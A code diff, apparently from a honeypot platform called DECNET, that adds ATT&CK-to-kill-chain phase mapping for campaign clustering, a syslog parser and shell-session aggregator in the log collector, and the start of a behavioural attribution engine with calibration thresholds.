    # not be assigned by any rule per TTP_TAGGING.md §UKC bridge.
    for entry in ttp_decky_phases or []:
        decky = entry.get("decky_id")
        tactic = entry.get("tactic")
        created_at_ts = entry.get("created_at_ts")
        if not isinstance(decky, str) or not isinstance(tactic, str):
            continue
        phase = tactic_to_ukc_phase(tactic)
        if phase is None:
            continue
        ts = float(created_at_ts) if isinstance(
            created_at_ts, (int, float)) else 0.0
        decky_set.add(decky)
        first_phase_per_decky.setdefault(decky, phase.value)
        last_phase_per_decky[decky] = phase.value
        first_seen_per_decky.setdefault(decky, ts)
        last_seen_per_decky[decky] = ts
    return IdentityFeatures(
        identity_uuid=row["uuid"],
        payload_hashes=frozenset(payload_hashes),
        c2_endpoints=frozenset(c2_endpoints),
        decky_set=frozenset(decky_set),
        first_phase_per_decky=first_phase_per_decky,
        last_phase_per_decky=last_phase_per_decky,
        first_seen_per_decky=first_seen_per_decky,
        last_seen_per_decky=last_seen_per_decky,
    )
@@ -132,8 +174,26 @@ class ConnectedComponentsCampaignClusterer(CampaignClusterer):
        # merged out — their winner is the active row and gets clustered
        # on its own.  This keeps the campaign graph from double-counting.
        active_rows = [r for r in rows if not r.get("merged_into_uuid")]
        # Pull TTP-derived per-decky phase observations per identity
        # (E.3.15). Failures here are non-fatal — the clusterer falls
        # back to the empty phase-handoff signal, same as the legacy
        # behavior, so a partial repo doesn't take the worker down.
        decky_phases_by_identity: dict[str, list[dict[str, Any]]] = {}
        for r in active_rows:
            try:
                decky_phases_by_identity[r["uuid"]] = (
                    await repo.list_ttp_decky_phases(r["uuid"])
                )
            except Exception:  # noqa: BLE001
                log.warning(
                    "campaign clusterer: list_ttp_decky_phases failed "
                    "for identity %s; phase-handoff edge inert",
                    r["uuid"],
                )
                decky_phases_by_identity[r["uuid"]] = []
        feature_list: list[IdentityFeatures] = [
-            from_identity_row(r) for r in active_rows
+            from_identity_row(r, decky_phases_by_identity.get(r["uuid"]))
            for r in active_rows
        ]
        row_by_uuid: dict[str, dict[str, Any]] = {
            r["uuid"]: r for r in active_rows
--- a/decnet/clustering/campaign/impl/similarity.py
+++ b/decnet/clustering/campaign/impl/similarity.py
@@ -342,7 +342,7 @@ def combined_campaign_weight(
 # ─── Adapter for synthetic-fixture tests ────────────────────────────────────
-def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:  # type: ignore[no-untyped-def]
+def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
    """Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
    Treats one ``SyntheticAttacker`` as one identity — adequate for
--- a/decnet/clustering/campaign/worker.py
+++ b/decnet/clustering/campaign/worker.py
@@ -105,11 +105,11 @@ async def run_campaign_clusterer_loop(
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
+        for task in (*wake_tasks, heartbeat_task):
-            if t is None:
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
--- a/decnet/clustering/impl/connected_components.py
+++ b/decnet/clustering/impl/connected_components.py
@@ -363,8 +363,9 @@ async def _roll_up_fingerprints(
    breaks the clusterer tick — the columns just stay stale until the
    next pass."""
    summaries = extract_fp_summaries(member_rows)
    fp_kwargs = {k: v for k, v in summaries.items() if k in {"ja3_hashes", "hassh_hashes", "tls_cert_sha256"}}
    try:
-        await repo.update_identity_fingerprints(identity_uuid, **summaries)
+        await repo.update_identity_fingerprints(identity_uuid, **fp_kwargs)
    except Exception:  # noqa: BLE001
        log.exception(
            "clusterer: failed to roll up fingerprints for identity=%s",
--- a/decnet/clustering/impl/similarity.py
+++ b/decnet/clustering/impl/similarity.py
@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
 # ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
-def from_synthetic(att) -> Observation:  # type: ignore[no-untyped-def]
+def from_synthetic(att) -> Observation:
    """Build an :class:`Observation` from a ``SyntheticAttacker``.
    Lives here so test code doesn't import the factory shape into the
--- a/decnet/clustering/ukc.py
+++ b/decnet/clustering/ukc.py
@@ -15,6 +15,7 @@ emits no events for unobservable phases.
 from __future__ import annotations
 from enum import Enum
 from typing import Final
 class UKCPhase(str, Enum):
@@ -106,3 +107,96 @@ def stage_of(phase: UKCPhase) -> str:
    if phase in STAGE_THROUGH:
        return "through"
    return "out"
 # MITRE ATT&CK tactic ID -> UKC phase. Covers the 14 enterprise tactics
 # plus the four ICS tactics referenced by Appendix A.7 (Conpot, MQTT).
 # Adding additional ICS tactics is a one-line addition. See
 # TTP_TAGGING.md "UKC bridge".
 ATTACK_TACTIC_TO_UKC: dict[str, UKCPhase] = {
    # Enterprise
    "TA0043": UKCPhase.RECONNAISSANCE,        # Reconnaissance
    "TA0042": UKCPhase.RESOURCE_DEVELOPMENT,  # Resource Development
    "TA0001": UKCPhase.DELIVERY,              # Initial Access
    "TA0002": UKCPhase.EXECUTION,             # Execution
    "TA0003": UKCPhase.PERSISTENCE,           # Persistence
    "TA0004": UKCPhase.PRIVILEGE_ESCALATION,  # Privilege Escalation
    "TA0005": UKCPhase.DEFENSE_EVASION,       # Defense Evasion
    "TA0006": UKCPhase.CREDENTIAL_ACCESS,     # Credential Access
    "TA0007": UKCPhase.DISCOVERY,             # Discovery
    "TA0008": UKCPhase.LATERAL_MOVEMENT,      # Lateral Movement
    "TA0009": UKCPhase.COLLECTION,            # Collection
    "TA0011": UKCPhase.COMMAND_AND_CONTROL,   # Command and Control
    "TA0010": UKCPhase.EXFILTRATION,          # Exfiltration
    "TA0040": UKCPhase.IMPACT,                # Impact
    # ICS — first-class projection so MQTT / Conpot / Modbus tags
    # don't drop out of campaign rollups when the clusterer projects
    # tactic to phase. ICS uses an independent tactic-ID range.
    "TA0100": UKCPhase.COLLECTION,            # ICS: Collection
    "TA0102": UKCPhase.DISCOVERY,             # ICS: Discovery
    "TA0105": UKCPhase.IMPACT,                # ICS: Impact
    "TA0106": UKCPhase.IMPACT,                # ICS: Impair Process Control
 }
 # ICS tactics live in a separate STIX bundle (mitre/ics-attack) that
 # DECNET does not currently load. They're exempt from the
 # enterprise-bundle validation in :func:`validate_against_attack_bundle`
 # so a startup check doesn't false-fail the moment ICS rules are wired.
 _NON_ENTERPRISE_TACTICS: Final[frozenset[str]] = frozenset(
    {"TA0100", "TA0102", "TA0105", "TA0106"}
 )
 def validate_against_attack_bundle() -> None:
    """Assert every enterprise tactic ID in :data:`ATTACK_TACTIC_TO_UKC` resolves in the loaded STIX bundle.
    Called at startup (see :mod:`decnet.ttp.impl.rule_engine`) so a
    typoed tactic ID surfaces as a fail-closed boot, not a silent
    miss in campaign rollups.
    """
    from decnet.ttp.attack_stix import assert_known_tactic_ids
    assert_known_tactic_ids(
        list(ATTACK_TACTIC_TO_UKC.keys()),
        source="decnet.clustering.ukc.ATTACK_TACTIC_TO_UKC",
        exempt=set(_NON_ENTERPRISE_TACTICS),
    )
 def tactic_to_ukc_phase(tactic: str) -> UKCPhase | None:
    """Map an ATT&CK tactic ID (e.g. ``"TA0001"``) to a :class:`UKCPhase`.
    Returns ``None`` for unknown tactics. The map is closed-over the
    enterprise + ICS tactics referenced by the rule pack; a tactic
    outside that set is a contributor bug, not a runtime miss.
    """
    return ATTACK_TACTIC_TO_UKC.get(tactic)
 # Inverse map, built once at import time. Several enterprise tactics
 # would collide (e.g. both TA0009 and TA0100 map to COLLECTION); the
 # enterprise tactic wins because it's listed first in
 # ATTACK_TACTIC_TO_UKC, which dict comprehension preserves via
 # last-write semantics — so we iterate in reverse to keep the FIRST
 # occurrence per phase. Pre-target phases (RECONNAISSANCE,
 # RESOURCE_DEVELOPMENT, WEAPONIZATION, SOCIAL_ENGINEERING) that are
 # not in OBSERVABLE_PHASES are deliberately lossy on the inverse —
 # TTP tags must never assign them, so projecting back to a tactic
 # is undefined. See TTP_TAGGING.md §UKC bridge.
 _UKC_TO_TACTIC: dict[UKCPhase, str] = {
    phase: tactic
    for tactic, phase in reversed(list(ATTACK_TACTIC_TO_UKC.items()))
 }
 def ukc_phase_to_tactic(phase: UKCPhase) -> str | None:
    """Map a :class:`UKCPhase` back to an ATT&CK tactic ID.
    Lossy on phases outside :data:`OBSERVABLE_PHASES` — pre-target
    phases (e.g. ``RECONNAISSANCE``, ``WEAPONIZATION``) return
    ``None`` because no rule emits them, so the inverse is
    undefined by design. The CDD test in E.2.9 pins which phases
    are lossy.
    """
    return _UKC_TO_TACTIC.get(phase)
--- a/decnet/clustering/worker.py
+++ b/decnet/clustering/worker.py
@@ -115,11 +115,11 @@ async def run_clusterer_loop(
            t.cancel()
        if heartbeat_task is not None:
            heartbeat_task.cancel()
-        for t in (*wake_tasks, heartbeat_task):
+        for task in (*wake_tasks, heartbeat_task):
-            if t is None:
+            if task is None:
                continue
            with contextlib.suppress(asyncio.CancelledError, Exception):
-                await t
+                await task
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
--- a/decnet/collector/worker.py
+++ b/decnet/collector/worker.py
@@ -18,6 +18,7 @@ from datetime import datetime
 from pathlib import Path
 from typing import Any, Callable, Optional
 from decnet.artifacts.shards import find_shard_with_sid
 from decnet.bus import topics as _topics
 from decnet.bus.factory import get_bus
 from decnet.bus.publish import (
@@ -75,6 +76,21 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
 )
 _RL_MAX_ENTRIES: int = 10_000
 # APP-NAMEs we never want to see in the ingestion stream — native unix
 # daemons that share a container with a DECNET service. Their logs are
 # noise: sshd's "Failed password for root from X" duplicates the
 # auth-helper's structured `auth_attempt` event, pam_unix repeats it
 # again, and CRON/systemd/etc. say nothing about attacker behavior.
 # Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list).
 _DROP_APPS: frozenset[str] = frozenset(
    a.strip()
    for a in os.environ.get(
        "DECNET_COLLECTOR_DROP_APPS",
        "sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
    ).split(",")
    if a.strip()
 )
 _rl_lock: threading.Lock = threading.Lock()
 _rl_last: dict[tuple[str, str, str, str], float] = {}
@@ -82,10 +98,11 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
 def _should_ingest(parsed: dict[str, Any]) -> bool:
    """
    Return True if this parsed event should be written to the JSON ingestion
-    stream. Rate-limited connection-lifecycle events return False when another
+    stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
-    event with the same (attacker_ip, decky, service, event_type) was emitted
+    rate-limits connection-lifecycle events within a dedup window.
    inside the dedup window.
    """
    if parsed.get("service", "") in _DROP_APPS:
        return False
    event_type = parsed.get("event_type", "")
    if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
        return True
@@ -116,6 +133,234 @@ def _reset_rate_limiter() -> None:
    with _rl_lock:
        _rl_last.clear()
 # ─── Session aggregator (TTP `attacker.session.ended` producer) ──────────────
 #
 # The TTP worker subscribes to ``attacker.session.ended`` and turns each
 # emitted command into a ``source_kind="command"`` :class:`TaggerEvent`
 # (see ``decnet/ttp/worker._build_events``). No upstream worker was
 # producing that topic — the rule pack therefore never fired on live
 # traffic. The aggregator below indexes shell-command events
 # per-attacker_ip and emits one ``attacker.session.ended`` envelope
 # whenever the SSH ``sessrec`` worker publishes ``session_recorded``.
 #
 # Memory bound: each attacker_ip's deque is capped by a TTL eviction
 # (default 3600 s). Override via ``DECNET_COLLECTOR_SESSION_AGG_TTL_SEC``.
 _SESSION_AGG_TTL_SEC: float = _parse_float_env(
    "DECNET_COLLECTOR_SESSION_AGG_TTL_SEC", 3600.0,
 )
 # Body of a bash PROMPT_COMMAND CMD line:
 #   ``CMD uid=0 user=root src=192.168.1.5 pwd=/root cmd=ls /var/www/html``
 # Splits into the structured fields the inspector renders + the
 # residual ``cmd=`` value (which may itself contain spaces — preserve
 # everything after ``cmd=`` as one token, do NOT word-split).
 _CMD_BODY_HEAD_KV_RE = re.compile(r'(\w+)=(\S+)')
 def _parse_cmd_msg(msg: str) -> dict[str, str]:
    """Split a bash CMD msg body into ``{uid, user, src, pwd, command}``.
    Returns the empty dict on a non-CMD msg. ``command`` carries the
    full post-``cmd=`` rest, including any embedded whitespace —
    tools like ``nmap -p- 192.168.1.0/24`` would otherwise lose
    everything after the first space.
    """
    if not msg.startswith("CMD "):
        return {}
    head, sep, cmd_rest = msg[4:].partition("cmd=")
    out: dict[str, str] = {}
    for k, v in _CMD_BODY_HEAD_KV_RE.findall(head):
        out[k] = v
    if sep:
        out["command"] = cmd_rest
    return out
 def _parse_iso_ts(value: str) -> Optional[datetime]:
    """Best-effort ISO-8601 parse for parsed event timestamps.
    The collector's parser stamps ``timestamp`` either as the original
    ISO-8601 string (when ``datetime.fromisoformat`` failed) or as the
    reformatted ``%Y-%m-%d %H:%M:%S`` string. Both round-trip through
    ``fromisoformat`` after a space→T swap. Returns None if neither
    shape parses — the aggregator skips events it can't time-stamp.
    """
    if not value:
        return None
    candidates = (value, value.replace(" ", "T"))
    for cand in candidates:
        try:
            return datetime.fromisoformat(cand)
        except ValueError:
            continue
    return None
 class _SessionAggregator:
    """Per-attacker_ip command index that emits ``attacker.session.ended``.
    Thread-safe — :meth:`add_event` is called from the per-container
    stream threads. Internal state is protected by a single lock; the
    publish fan-out happens inside the lock for simplicity (the
    downstream publish_fn is the thread-safe marshaller from
    :mod:`decnet.bus.publish`, which is non-blocking).
    """
    def __init__(
        self,
        publish_fn: Callable[[str, dict[str, Any], str], None],
        *,
        ttl_sec: float = _SESSION_AGG_TTL_SEC,
    ) -> None:
        self._publish = publish_fn
        self._ttl = ttl_sec
        self._lock = threading.Lock()
        # attacker_ip → list of (timestamp, parsed_event) tuples.
        # Stored as a list rather than a deque so the ``in_window``
        # filter can index linearly; the per-attacker volume is
        # bounded by the TTL and by typical session size (≤ a few
        # hundred commands) so this stays cheap.
        self._cmds: dict[str, list[tuple[datetime, dict[str, Any]]]] = {}
    def add_event(self, parsed: dict[str, Any]) -> None:
        """Index a parsed event. Emits on ``session_recorded``."""
        event_type = parsed.get("event_type", "")
        attacker_ip = parsed.get("attacker_ip") or ""
        if not attacker_ip or attacker_ip == "Unknown":
            return
        ts = _parse_iso_ts(str(parsed.get("timestamp", "")))
        if ts is None:
            return
        with self._lock:
            self._evict_expired(ts)
            if event_type == "command":
                self._cmds.setdefault(attacker_ip, []).append((ts, parsed))
                return
            if event_type == "session_recorded":
                self._emit_session(parsed, attacker_ip, ts)
    def _evict_expired(self, now: datetime) -> None:
        """Drop commands older than ``self._ttl`` seconds."""
        cutoff = now.timestamp() - self._ttl
        for ip, entries in list(self._cmds.items()):
            kept = [(t, p) for t, p in entries if t.timestamp() >= cutoff]
            if kept:
                self._cmds[ip] = kept
            else:
                del self._cmds[ip]
    def _emit_session(
        self, parsed: dict[str, Any], attacker_ip: str, ended_at: datetime,
    ) -> None:
        """Build an ``attacker.session.ended`` envelope and publish it.
        Slices the per-IP deque to commands whose timestamp falls
        inside ``[ended_at - duration_s, ended_at]``. Commands stay in
        the deque after the slice — the TTL eviction is the only path
        that drops them, so two back-to-back sessions for the same IP
        share the visible window without losing rows.
        """
        fields = parsed.get("fields", {}) or {}
        duration_raw = fields.get("duration_s") or "0"
        try:
            duration_s = float(duration_raw)
        except (TypeError, ValueError):
            duration_s = 0.0
        sid = str(fields.get("sid") or "")
        service = str(fields.get("service") or parsed.get("service") or "")
        decky = parsed.get("decky") or ""
        commands_window = self._cmds.get(attacker_ip, [])
        cutoff_lo = ended_at.timestamp() - max(duration_s, 0.0)
        commands: list[dict[str, Any]] = []
        for idx, (cmd_ts, cmd_parsed) in enumerate(commands_window):
            if cmd_ts.timestamp() < cutoff_lo:
                continue
            cmd_fields = cmd_parsed.get("fields", {}) or {}
            # Pull structured uid/user/src/pwd/command from the bash
            # msg body. The inspector renders these as separate
            # key/value rows, which is much friendlier than dumping
            # the raw ``CMD uid=0 user=... cmd=...`` string into a
            # single ``command_text`` blob.
            parsed_kv = _parse_cmd_msg(str(cmd_parsed.get("msg", "")))
            cmd_text = (
                cmd_fields.get("command")
                or cmd_fields.get("cmd")
                or parsed_kv.get("command")
                or cmd_parsed.get("msg", "")
            )
            entry: dict[str, Any] = {
                "id": f"{sid}#{idx}" if sid else f"{attacker_ip}-{cmd_ts.isoformat()}",
                "command_text": str(cmd_text),
                "ts": cmd_ts.isoformat(),
                "decky": cmd_parsed.get("decky", ""),
                "service": cmd_parsed.get("service", ""),
            }
            for key in ("uid", "user", "src", "pwd"):
                value = parsed_kv.get(key) or cmd_fields.get(key)
                if value is not None:
                    entry[key] = value
            commands.append(entry)
        # Resolve the asciinema shard so consumers (notably the BEHAVE-SHELL
        # session-ended handler in the profiler worker) don't each have to
        # disk-reach independently. Shard fields can be malformed or the
        # transcripts dir may not exist yet — find_shard_with_sid returns
        # None in those cases and we publish ``shard_path: None`` so the
        # consumer skips honestly. Additive field; existing TTP consumers
        # ignore it.
        shard_path: str | None = None
        resolve_error: str | None = None
        if sid and decky and service:
            try:
                resolved = find_shard_with_sid(decky, service, sid)
            except (ValueError, OSError, PermissionError) as exc:
                resolve_error = f"{type(exc).__name__}: {exc}"
                resolved = None
            if resolved is not None:
                shard_path = str(resolved)
        if shard_path is None and sid:
            # Loud-by-default — the BEHAVE-SHELL handler will skip
            # session.ended events with shard_path=None, so a silent
            # miss here means the profiler panel never hydrates. Surface
            # the most common failure modes inline so the operator can
            # diagnose without grepping decnet/artifacts/shards.py.
            #
            # 1. ARTIFACTS_ROOT not readable by the collector's user
            #    (perm 0750 decnet:decnet vs. User=anti without
            #    SupplementaryGroups=decnet).
            # 2. service whitelist (_SERVICE_RE accepts ssh|telnet only).
            # 3. sessrec hasn't flushed the shard for this sid yet
            #    (collector tick won the race; next tick recovers).
            logger.warning(
                "collector: shard_path=None decky=%s service=%s sid=%s "
                "(error=%s) — profiler will skip this session.ended; "
                "check ARTIFACTS_ROOT perms / service whitelist",
                decky, service, sid, resolve_error or "shard not found",
            )
        payload: dict[str, Any] = {
            "session_id": sid or None,
            "attacker_uuid": None,  # consumer resolves via repo
            "attacker_ip": attacker_ip,
            "decky_id": decky,
            "service": service,
            "ended_at": ended_at.isoformat(),
            "duration_s": duration_s,
            "commands": commands,
            "shard_path": shard_path,
        }
        topic = _topics.attacker(_topics.ATTACKER_SESSION_ENDED)
        try:
            self._publish(topic, payload, _topics.ATTACKER_SESSION_ENDED)
        except Exception as exc:  # noqa: BLE001
            logger.debug(
                "collector: session.ended publish failed: %s", exc,
            )
 # ─── RFC 5424 parser ──────────────────────────────────────────────────────────
 _RFC5424_RE = re.compile(
@@ -129,6 +374,27 @@ _RFC5424_RE = re.compile(
    r"(\S+) "       # 4: MSGID (event_type)
    r"(.+)$",       # 5: SD element + optional MSG
 )
 # Honeypot SSH containers export a ``PROMPT_COMMAND`` that calls
 # ``logger --rfc5424 --msgid command -p user.info -t bash "CMD …"``.
 # That inner RFC 5424 line lands on the container's stdout, where the
 # Docker stream reader prepends ANOTHER RFC 5424 envelope (PRI=14,
 # HOSTNAME=<decky>, APP-NAME=1, MSGID=NIL). The outer parse therefore
 # sees ``event_type == "-"`` while the real MSGID (``command``) is
 # inside the body. We detect that case and re-extract the inner
 # ``HOSTNAME APP-NAME PROCID MSGID rest`` so downstream consumers see
 # ``event_type == "command"`` plus the real source hostname.
 #
 # Anchored on an ISO-8601 timestamp at the head of the body so we
 # don't false-match free-form prose like "Connection from 1.2.3.4".
 _INNER_RFC5424_RE = re.compile(
    r"^(\d{4}-\d{2}-\d{2}T\S+)\s+"  # 1: inner TIMESTAMP
    r"(\S+)\s+"                       # 2: inner HOSTNAME
    r"(\S+)\s+"                       # 3: inner APP-NAME
    r"\S+\s+"                         # PROCID (NIL or PID)
    r"(\S+)\s+"                       # 4: inner MSGID
    r"(.+)$",                         # 5: inner SD/MSG remainder
 )
 _SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
 _PARAM_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')
 _IP_FIELDS = ("src_ip", "src", "client_ip", "remote_ip", "remote_addr", "target_ip", "ip")
@@ -168,8 +434,23 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
    ts_raw, decky, service, event_type, sd_rest = m.groups()
    fields: dict[str, str] = {}
    msg: str = ""
    # Honeypot SSH PROMPT_COMMAND lines are double-wrapped (Docker
    # stdout envelope around the inner ``logger --msgid command`` line).
    # Outer MSGID is NIL; the real MSGID is inside the body. Detect
    # the inner shape and re-extract HOSTNAME / APP-NAME / MSGID /
    # remainder so downstream extraction sees the real header.
    if event_type == "-" and sd_rest.startswith("-"):
        body = sd_rest[1:].lstrip()
        inner = _INNER_RFC5424_RE.match(body)
        if inner is not None:
            _i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
            decky = i_host
            service = i_app
            event_type = i_msgid
            sd_rest = i_rest
    msg: str = ""
    if sd_rest.startswith("-"):
        msg = sd_rest[1:].lstrip()
    elif sd_rest.startswith("["):
@@ -177,16 +458,28 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
        if block:
            for k, v in _PARAM_RE.findall(block.group(1)):
                fields[k] = v.replace('\\"', '"').replace("\\\\", "\\").replace("\\]", "]")
-            msg_match = re.search(r'\]\s+(.+)$', sd_rest)
+        # Always recover the post-SD message tail, even when the SD
-            if msg_match:
+        # block isn't ``relay@55555`` (e.g. the ``timeQuality`` block
-                msg = msg_match.group(1).strip()
+        # syslog auto-emits on bash CMD lines). Without this the body
        # of unwrapped PROMPT_COMMAND lines stays empty and the
        # attacker_ip kv-fallback below has nothing to scan.
        msg_match = re.search(r'\]\s+(.+)$', sd_rest)
        if msg_match:
            msg = msg_match.group(1).strip()
    else:
        msg = sd_rest
    attacker_ip = "Unknown"
    for fname in _IP_FIELDS:
        if fname in fields:
-            attacker_ip = fields[fname]
+            raw = fields[fname]
            # remote_addr may be "host:port" — split so identity keys on IP only.
            host, _, port = raw.rpartition(":")
            if host and port.isdigit():
                attacker_ip = host.strip("[]")  # handle [::1]:port IPv6 form
                fields.setdefault("remote_port", port)
            else:
                attacker_ip = raw
            break
    # Fallback for plain `logger` callers that don't use SD params (notably
@@ -220,6 +513,12 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
    except ValueError:
        ts_formatted = ts_raw
    # Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
    # "CMD ") get event_type rewritten to "command". `fields` stays empty
    # so the frontend's msg-based pill rendering doesn't double up.
    if event_type == "-" and msg.startswith("CMD "):
        event_type = "command"
    return {
        "timestamp": ts_formatted,
        "decky": decky,
@@ -346,7 +645,7 @@ def _stream_container(
    publish_fn: CollectorPublishFn | None = None,
 ) -> None:
    """Stream logs from one container and append to the host log files."""
-    import docker  # type: ignore[import]
+    import docker
    lf: Optional[Any] = None
    jf: Optional[Any] = None
@@ -416,12 +715,17 @@ def _make_system_log_publisher(
    thread can call it unconditionally.  Otherwise each call is marshalled
    onto *loop* (the asyncio event loop that owns the bus socket) via
    ``make_thread_safe_publisher``.
    The same call also feeds a :class:`_SessionAggregator` so shell
    commands are indexed per-attacker_ip and ``attacker.session.ended``
    fires whenever the SSH ``sessrec`` worker logs ``session_recorded``.
    """
    raw_publish = make_thread_safe_publisher(bus, loop) if bus is not None else None
    if raw_publish is None:
        return lambda _parsed: None
    topic = _topics.system(_topics.SYSTEM_LOG)
    aggregator = _SessionAggregator(raw_publish)
    def _publish(parsed: dict[str, Any]) -> None:
        event_type = parsed.get("event_type", "")
@@ -436,6 +740,7 @@ def _make_system_log_publisher(
            },
            event_type,
        )
        aggregator.add_event(parsed)
    return _publish
@@ -450,7 +755,7 @@ async def log_collector_worker(log_file: str) -> None:
    Watches Docker events to pick up containers started after initial scan.
    """
-    import docker  # type: ignore[import]
+    import docker
    log_path = Path(log_file)
    json_path = log_path.with_suffix(".json")
--- a/decnet/config_ini.py
+++ b/decnet/config_ini.py
@@ -39,6 +39,7 @@ Shape::
    master-host = 10.0.0.1        # required on agents
    syslog-port = 6514
    swarmctl-port = 8770
    swarmctl-host = 127.0.0.1     # bind address for `decnet swarmctl`
    [logging]
    system-log = /var/log/decnet/decnet.system.log
@@ -120,6 +121,7 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
        "master-host": "DECNET_SWARM_MASTER_HOST",
        "syslog-port": "DECNET_SWARM_SYSLOG_PORT",
        "swarmctl-port": "DECNET_SWARMCTL_PORT",
        "swarmctl-host": "DECNET_SWARMCTL_HOST",
    },
    "logging": {
        "system-log": "DECNET_SYSTEM_LOGS",
--- a/decnet/correlation/attribution/init.py
+++ b/decnet/correlation/attribution/init.py
@@ -0,0 +1,21 @@
 """DECNET attribution engine — v0 aggregation library.
 Pure library: per-(identity, primitive) state machine over BEHAVE-SHELL
 observations. No I/O, no bus, no DB. The bus subscriber and DB writes
 live in :mod:`decnet.correlation.attribution_worker` so this package
 stays trivially testable with synthetic observation lists.
 See ``development/ATTRIBUTION-ENGINE.md`` for the full design and the
 explicit bright line: this engine does NOT do persona classification
 (HUMAN/LLM/SCRIPTED), does NOT gate access, does NOT attribute to
 named persons. It surfaces *behavioural coherence* and *behavioural
 drift*, and stops there.
 """
 from __future__ import annotations
 from decnet.correlation.attribution.aggregate import (
    AttributionState,
    aggregate_observations,
 )
 __all__ = ["AttributionState", "aggregate_observations"]
--- a/decnet/correlation/attribution/_thresholds.py
+++ b/decnet/correlation/attribution/_thresholds.py
@@ -0,0 +1,62 @@
 """Calibration thresholds for the attribution engine — every magic
 number lives here, named, with the calibration source cited.
 v0 values are heuristic. Real calibration ships when red-team
 exercises produce labelled trace data
 (``ATTRIBUTION-ENGINE.md`` §"Out of scope"). Until then these constants
 are the engine's only knobs; aggregate.py never embeds a literal.
 """
 from __future__ import annotations
 # ── Categorical merger ────────────────────────────────────────────────
 # Last-N window size for the categorical state machine. 5 calibrates
 # against typical session counts (most attackers are observed < 10
 # times before they go quiet — ATTRIBUTION-ENGINE.md §"Open question
 # 2"). Operators with long-running attackers will want a wider window
 # in v1.
 CATEGORICAL_WINDOW_N = 5
 # Minimum observations before the merger emits anything other than
 # ``unknown``. Below this floor the state machine has no signal.
 MIN_OBSERVATIONS_FOR_STATE = 3
 # Categorical merger is one-outlier-tolerant: in a window of N=5, the
 # state is ``stable`` if at least ``MAJORITY_THRESHOLD`` agree.
 CATEGORICAL_MAJORITY_THRESHOLD = 4
 # ── Numeric merger ────────────────────────────────────────────────────
 # EWMA smoothing factor for numeric primitives. 0.3 weights recent
 # observations enough to surface drift quickly without flapping on
 # single outliers.
 NUMERIC_EWMA_ALPHA = 0.3
 # Coefficient-of-variation thresholds: dispersion / |mean|.
 NUMERIC_STABLE_DISPERSION_PCT = 0.20    # < 20% of mean → stable
 NUMERIC_DRIFT_MEAN_SHIFT_PCT = 0.30     # mean moved > 30% → drifting
 NUMERIC_CONFLICT_DISPERSION_PCT = 1.0   # > 100% of mean → conflicted
 # ── Hash merger ───────────────────────────────────────────────────────
 # Rotations within HASH_DRIFT_WINDOW count toward state transitions.
 # Below DRIFT_MAX → drifting; above → conflicted. The values mirror the
 # DEBT-032 fingerprint-rotation calibration — bumped by one because
 # the attribution engine takes one rotation as evidence-of-life, not
 # yet evidence-of-drift.
 HASH_DRIFT_MAX = 2
 HASH_DRIFT_WINDOW_SECS = 24 * 60 * 60  # 24h
 # ── Multi-actor cap ───────────────────────────────────────────────────
 # multi_actor confidence is capped to keep the dashboard honest about
 # how noisy this signal is. ATTRIBUTION-ENGINE.md §"Open question 1":
 # flapping primitives on flaky networks look like two operators.
 MULTI_ACTOR_MAX_CONFIDENCE = 0.6
 # ── Cross-primitive correlator (Phase 5) ──────────────────────────────
 # Minimum number of primitives that must independently flag
 # ``multi_actor`` for the same identity before
 # ``attribution.profile.multi_actor_suspected`` fires.
 MULTI_ACTOR_MIN_PRIMITIVES = 2
 # Tick interval for the periodic walk in
 # :mod:`decnet.correlation.attribution_worker`. Configurable via env
 # var in v1; hardcoded in v0.
 MULTI_ACTOR_TICK_SECS = 60.0
--- a/decnet/correlation/attribution/aggregate.py
+++ b/decnet/correlation/attribution/aggregate.py
@@ -0,0 +1,418 @@
 """Per-(identity, primitive) state-machine — the attribution engine's
 core merge logic.
 Pure: given a list of BEHAVE observations for one
 ``(identity_uuid, primitive)`` pair (already ordered by ``ts`` ASC),
 returns the derived state. No DB, no bus, no I/O. The worker
 (``decnet.correlation.attribution_worker``) is responsible for loading
 the observations and writing the state row.
 State vocabulary is frozen at five values (see
 ``ATTRIBUTION-ENGINE.md``):
 * ``unknown``      — < ``MIN_OBSERVATIONS_FOR_STATE`` observations
 * ``stable``       — recent N agree
 * ``drifting``     — recent N stable but disagree with older N
 * ``conflicted``   — recent N split
 * ``multi_actor``  — conflicted + cross-session alternation pattern
 Phase 2 ships :func:`_aggregate_categorical` (the dominant ValueKind
 for BEHAVE-SHELL primitives). Phase 3 adds numeric + hash mergers and
 the ValueKind dispatcher in :func:`aggregate_observations`.
 """
 from __future__ import annotations
 from collections import Counter
 from dataclasses import dataclass
 from typing import Any, Sequence
 from decnet.correlation.attribution import _thresholds as _T
 __all__ = [
    "AttributionState",
    "aggregate_observations",
    "aggregate_categorical",
    "aggregate_numeric",
    "aggregate_hash",
 ]
@dataclass(frozen=True)
 class AttributionState:
    """Output of the merger for one ``(identity, primitive)`` pair.
    The fields map onto :class:`AttributionStateRow` columns; the
    worker composes the final dict for ``upsert_attribution_state``
    by adding ``identity_uuid`` + ``primitive`` (the merger does not
    own the natural key) and a ``last_change_ts`` derived from the
    prior row.
    """
    current_value: Any
